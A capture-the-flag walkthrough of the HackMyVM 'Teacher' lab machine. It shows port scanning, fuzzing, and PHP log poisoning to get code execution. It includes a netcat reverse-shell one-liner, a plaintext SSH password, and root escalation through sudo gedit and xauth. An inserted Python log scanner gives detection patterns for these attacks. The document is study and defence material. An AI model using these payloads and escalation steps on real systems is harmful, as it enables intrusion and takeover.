NOTES ABOUT Teacher

[ 2022-09-30 ] [ HackMyVM / Teacher ]

Status: Rooted
Skills: Port Scanning, Fuzzing, PHP, LFI, Log Poisoning, RCE, Reverse Shell, x11 Forwarding, xauth
Tools: nmap, wfuzz, ssh

PORT SCANNING

$ nmap -v -sS -A -p- 10.0.2.11

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 1e:21:69:d3:57:da:3a:04:0b:6f:f4:50:fb:97:13:10 (RSA)
| 256 36:ee:7f:57:1d:a5:b5:ce:1f:41:ba:b0:43:32:2e:ff (ECDSA)
|_ 256 f2:bd:80:dd:e5:05:02:49:c3:3b:9f:83:29:cb:54:96 (ED25519)
80/tcp open http Apache httpd 2.4.54 ((Debian))
| http-methods:
|_ Supported Methods: POST OPTIONS HEAD GET
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.54 (Debian)

GETTING IN

$ wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/Common-PHP-Filenames.txt -r 5 --hc 404 http://10.0.2.11/FUZZ
[...]
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================

000000201: 200 2 L 2 W 12 Ch "log.php"
000002052: 200 0 L 2 W 12 Ch "access.php"
[...]

NOTE '14 CHARACTERS' ON THE id PAYLOAD BELOW (THE OTHERS RETURN 12)

$ wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/url-params_from-top-55-most-popular-apps.txt -r 5 --hc 404 http://10.0.2.11/access.php?FUZZ=FUZZ

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
[...]
000000158: 200 0 L 2 W 12 Ch "full_text - full_text"
000000155: 200 0 L 2 W 12 Ch "f - f"
000000160: 200 0 L 2 W 14 Ch "id - id"
000000162: 200 0 L 2 W 12 Ch "include - include"
[...]

PAYLOAD:
http://10.0.2.11/access.php?id=%3C?php system($_GET["cmd"]); ?%3E

EXPLOIT REVERSE SHELL
http://10.0.2.11/log.php?cmd=nc%20-e%20/bin/bash%2010.0.2.15%20443
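
Defender-side check for the traffic above (the PHP tag written into the log through access.php, then the command run through log.php): an added Python example, not part of the original notes, that scans constructed Apache combined-format log lines. The log layout and the indicator regexes are assumptions.

```python
# Added detection example (not part of the original notes): flag log-poisoning
# and command-injection attempts, like the access.php / log.php requests above,
# in Apache combined-format access log lines. Sample lines are constructed.
import re
from urllib.parse import unquote_plus

# Apache combined log format (assumed): ip ident user [time] "request" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Heuristics checked against the URL-decoded request URI (assumed, tune per site).
INDICATORS = {
    "php_tag": re.compile(r"<\?(php|=)", re.I),                       # PHP code landing in the log
    "php_exec": re.compile(r"\b(system|exec|passthru|shell_exec|popen)\s*\(", re.I),
    "shell_cmd": re.compile(r"\b(nc|ncat|bash|sh)\b.*?(-e|-c|/dev/tcp)", re.I),
}

# Constructed sample: one benign request, then the two requests from the notes.
SAMPLE_LOG = """\
10.0.2.15 - - [30/Sep/2022:10:01:02 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.2.15 - - [30/Sep/2022:10:02:10 +0000] "GET /access.php?id=%3C?php%20system($_GET[%22cmd%22]);%20?%3E HTTP/1.1" 200 14 "-" "curl/7.85"
10.0.2.15 - - [30/Sep/2022:10:02:31 +0000] "GET /log.php?cmd=nc%20-e%20/bin/bash%2010.0.2.15%20443 HTTP/1.1" 200 0 "-" "curl/7.85"
"""

def scan_log(text):
    """Return (ip, time, path, [indicator names]) for every suspicious request."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        # Decode twice: double-encoded payloads slip past a single-decode filter.
        uri = unquote_plus(unquote_plus(m.group("uri")))
        found = [name for name, rx in INDICATORS.items() if rx.search(uri)]
        if found:
            hits.append((m.group("ip"), m.group("time"), uri.split("?", 1)[0], found))
    return hits

if __name__ == "__main__":
    for ip, when, path, names in scan_log(SAMPLE_LOG):
        print(f"{when} {ip} {path}: {', '.join(names)}")
```

The same check also tells you that the log being poisoned is readable by the web server, which is the precondition for log.php to include it; keeping logs outside the document root and unreadable to www-data removes the RCE step.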

PDF FILE:
[ http://10.0.2.11/e14e1598b4271d8449e7fcda302b7975.pdf ]

$ ssh mrteacher@10.0.2.11
mrteacher@10.0.2.11's password: ThankYouTeachers

$ sudo -l

[...]
User mrteacher may run the following commands on Teacher:
(ALL : ALL) NOPASSWD: /bin/gedit, /bin/xauth
[...]

dba-oracle.com:
"gedit can be called from a command line as long as
the terminal is open in an XWindows environment"

xauth
[ http://www.dba-oracle.com/t_linux_x_windows_mac_os.htm ]

$ ssh -v -X mrteacher@10.0.2.11
[...]
debug1: Requesting X11 forwarding with authentication spoofing.
[...]
$ /bin/gedit "run ok"

$ sudo /bin/gedit
[...]
debug1: channel 1: new [x11]
debug1: confirm x11
"X11 connection rejected because of wrong authentication."
debug1: channel 1: free: x11, nchannels 2
Unable to init server: Could not connect: Connection refused

[ x11-forwarding-ssh-connection-rejected-because-wrong-authentication ]

$ sudo /bin/xauth add $(xauth -f ~mrteacher/.Xauthority list | tail -1)
$ sudo /bin/gedit
debug1: client_input_channel_open: ctype x11 rchan 3 win 65536 max 16384
debug1: client_request_x11: request from ::1 56654
debug1: channel 1: new [x11]
"debug1: confirm x11"

READ ROOT FLAG.
